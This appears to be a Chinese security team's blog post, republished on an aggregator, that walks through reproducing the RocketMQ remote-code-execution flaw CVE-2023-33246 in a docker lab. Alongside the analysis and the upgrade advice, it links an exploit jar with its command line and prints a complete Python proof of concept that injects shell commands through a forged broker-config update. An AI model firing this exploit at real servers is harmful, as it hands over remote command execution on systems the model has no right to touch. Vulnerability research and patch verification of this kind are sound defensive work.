首页 时事 民生 政务 教育 文化 科技 财富 体娱 健康 情感
更多
旅行 百科 职场 楼市 企业 乐活 学术 汽车 时尚 创业 美食 幽默 美体 文摘

RocketMQ 最新漏洞手把手复现 CVE-2023-33246

文摘   科技   2023-06-09 14:01   广东  

“A9 Team 甲方攻防团队,成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域,持续分享安全运营和攻防的思考和实践。”


01

前言


本文章只用于技术交流和学习,若使用本文章提供的技术信息进行非法操作,后果均由使用者本人负责


02

什么是Apache RocketMQ ?

Apache RocketMQ 是一种分布式消息传递框架,它由阿里巴巴集团开发。RocketMQ 的设计目标是提供一种高可用、高性能、可扩展、易于使用的的消息传递解决方案,适用于分布式应用程序、微服务架构、云计算、大数据等领域。
RocketMQ 提供了多种功能,包括消息传递、分布式集群、负载均衡、故障恢复、消息持久化等。它支持多种消息模式,包括广播模式、集群模式、点对点模式等,用户可以根据不同的场景和需求选择不同的模式。


RocketMQ的部署模型如下图所示:




Apache RocketMQ 部署架构上主要分为四部分:

Producer、Consumer、NameServer、 Broker


具体各个部分具体功能或作用可参考官网描述:

https://rocketmq.apache.org/zh/docs/4.x/



03

漏洞描述
RocketMQ 5.1.0 及以下版本存在任意代码注入漏洞。RocketMQ的NameServer、Broker、Controller等多个组件外网泄露,缺少权限验证。攻击者可以使用更新配置功能以RocketMQ运行的系统用户身份执行命令来利用该漏洞。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果


04

漏洞分析


漏洞成因:

1.提供无加密与鉴权的不安全服务;

2.对于用户输入的检查与过滤不足。


由exp源码可见,整个过程并不复杂,在生成 DefaultMQAdminExt 实例以及调用 updateBrokerConfig方法的关键过程中,都没有任何鉴权凭证的输入,属于未授权访问范畴。以至于在攻击过程中exp可以冒仿Console节点,访问NameServer节点获取注册 Broker数据,而不需任何鉴权,且数据明文传输。EXP仿冒NameServer向Broker发送配置修改数据,修改 rocketmqHome 函数同时在配置参数中拼接了操作系统命。



05

漏洞复现


环境搭建:

docker拉取镜像

docker pull apache/rocketmq:4.9.1docker pull apacherocketmq/rocketmq-console:2.0.0

# 启动 nameserver NameServer启动后监听端口,等待Broker、Producer、Consumer连接,相当于一个路由控制中心。

docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv

# 启动 Broker。与所有 NameServer 保持长连接,定时发送心跳包。心跳包中包含当前 Broker 信息以及存储所有 Topic 信息。注册成功后,NameServer 集群中就有 Topic跟Broker 的映射关系。

docker run -d --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf

#启动console。

docker run -dit --name mqconsole -p 8080:8080 -e "JAVA_OPTS=-Drocketmq.config.namesrvAddr=mqsrv:9876 -Drocketmq.config.isVIPChannel=false" apacherocketmq/rocketmq-console:2.0.0


PS: 注意broker、console启动时会指定关联namesrv的地址


启动完成后如图所示:


访问http://ip:8080,为如下控制台界面



EXP:

https://github.com/SuperZero/CVE-2023-33246/blob/main/CVE-2023-33246.jar

使用方式:

java -jar CVE-2023-33246.jar -ip "被攻击host" -cmd "执行的命令"

通过使漏洞主机执行curl 命令访问自建http服务来验证命令是否执行成功。


成功访问,证明命令执行成功,漏洞存在。



还有由Malayke师傅使用python写的POC,大家可以尝试使用验证


# CVE-2023-33246 RocketMQ POC

import socketimport sys



if len(sys.argv) < 4:    print('Usage: python3 poc.py <ip> <port> <command>')    sys.exit(1)

def send_data(ip, port, payload):    # Create a socket object    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # Connect to the server at the specified IP and port    s.connect((ip, port))

    # Send the payload    s.sendall(payload)    resp = s.recv(1024)    print(resp)    # Close the socket    s.close()





if '__main__' == __name__:    ip = sys.argv[1]    port = int(sys.argv[2])        command = ' '.join(sys.argv[3:]).strip()    hex_payload_prefix = '000000cd000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f20'        hex_payload_suffix = '3b0a'    payload = bytes.fromhex(hex_payload_prefix) + command.encode() + bytes.fromhex(hex_payload_suffix)    hex_payload_length = hex(len(payload) - 4)[2:]    payload = payload.hex().replace('000000cd000000','000000' + hex_payload_length + '000000')    payload = bytes.fromhex(payload)

send_data(ip, port, payload)


06
修复建议

目前官方已发布安全修复更新,受影响用户可以升级到Apache RocketMQ 5.1.1或者4.9.6


下载链接:

https://rocketmq.apache.org/download/


07

参考链接


1.https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT

2.https://github.com/SuperZero/CVE-2023-33246

3.https://blog.csdn.net/jdhellfire/article/details/131009358

4.https://rocketmq.apache.org/zh/docs/4.x/











 http://mp.weixin.qq.com/s?__biz=MzkzNzI2Mzc0Ng==&mid=2247485608&idx=1&sn=e00de891822ca255194ab43e8f676752
A9 Team
A9 Team 甲方攻防团队,成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域,持续分享安全运营和攻防的思考和实践,期望和朋友们共同进步,守望相助,合作共赢。
 最新文章
安全自动化与人工智能:网络防御的新前沿
无文件攻击利用与防范
安全运营之告警如何区分自己人
如何有效防范网络钓鱼攻击
终端防病毒系统运营过程的常见问题及应对措施
以漏洞挖掘的思路看CVE-2023-46604-ActiveMQ反序列化RCE
AI 安全运营的新篇章:Dify 的应用与实践(一)
勒索病毒演练实践
利用域控机器账户进行DCSync权限维持
表哥被钓鱼中招,教表哥如何识别钓鱼网站
记一次基于 SO 解密 Jar 包的反编译破解思路
生成式人工智能
数据安全离职审计实践分享
常见协议数据包解析
Windows日志一把梭
原型污染漏洞的简析及利用
数据安全离职审计实践分享
终端安全漏洞运营
初探威胁情报平台
CVE-2023-41892 Craft-CMS-远程代码执行漏洞
【极思】五年安全运营实践总结与未来思考
【极思】以攻促防:勒索软件攻击实战演练
K8S集群自身组件的 一些安全问题
钓鱼邮件:WPS 0Day漏洞的威胁和应对
WIFI渗透
泛微OA v10_20211213_Offline 未授权访问漏洞
sqlmap也能反制?我不信
【A9】请求加密后的渗透测试方法
【A9】简单聊聊前端加密
安全运营变革:SOAR与SIEM完美融合的最佳实践
【A9】安全运营之外部事件管理
【A9】certutil,wmic命令执行敏感操作
【A9】安全运营之内部事件管理
【A9】Electron 桌面应用程序 XSS到RCE 的学习
【A9】CVE-2022-21661-WORDPRESS-SQL-注入
【A9】xred病毒感染事件
【A9】终端安全风险主要来源及防范措施
【A9】数据安全运营告警处置实践分享
【A9】数据安全运营告警处置流程实践
【A9】rke 部署K8S集群及 Rancher部署
【A9】初探应急响应
【A9】某官网应急响应排查
实践|病毒情报自动化闭环运营
【A9】基于IPDRR网络安全框架,浅谈数据安全运营
【A9】XES-killer
【A9】工作组织架构变更引发的思考
【A9】记一次漏洞修复过程中遇到yum命令行的问题
【A9】初探eBPF
RocketMQ 最新漏洞手把手复现 CVE-2023-33246
【A9】Fastjson反序列化漏洞原理
 分类
时事
民生
政务
教育
文化
科技
财富
体娱
健康
情感
旅行
百科
职场
楼市
企业
乐活
学术
汽车
时尚
创业
美食
幽默
美体
文摘
 原创标签
时事 社会 财经 军事 教育 体育 科技 汽车 科学 房产 搞笑 综艺 明星 音乐 动漫 游戏 时尚 健康 旅游 美食 生活 摄影 宠物 职场 育儿 情感 小说 曲艺 文化 历史 三农 文学 娱乐 电影 视频 图片 新闻 宗教 电视剧 纪录片 广告创意 壁纸头像 心灵鸡汤 星座命理 教育培训 艺术文化 金融财经 健康医疗 美妆时尚 餐饮美食 母婴育儿 社会新闻 工业农业 时事政治 星座占卜 幽默笑话 独立短篇 连载作品 文化历史 科技互联网
 发布位置
广东 北京 山东 江苏 河南 浙江 山西 福建 河北 上海 四川 陕西 湖南 安徽 湖北 内蒙古 江西 云南 广西 甘肃 辽宁 黑龙江 贵州 新疆 重庆 吉林 天津 海南 青海 宁夏 西藏 香港 澳门 台湾 美国 加拿大 澳大利亚 日本 新加坡 英国 西班牙 新西兰 韩国 泰国 法国 德国 意大利 缅甸 菲律宾 马来西亚 越南 荷兰 柬埔寨 俄罗斯 巴西 智利 卢森堡 芬兰 瑞典 比利时 瑞士 土耳其 斐济 挪威 朝鲜 尼日利亚 阿根廷 匈牙利 爱尔兰 印度 老挝 葡萄牙 乌克兰 印度尼西亚 哈萨克斯坦 塔吉克斯坦 希腊 南非 蒙古 奥地利 肯尼亚 加纳 丹麦 津巴布韦 埃及 坦桑尼亚 捷克 阿联酋 安哥拉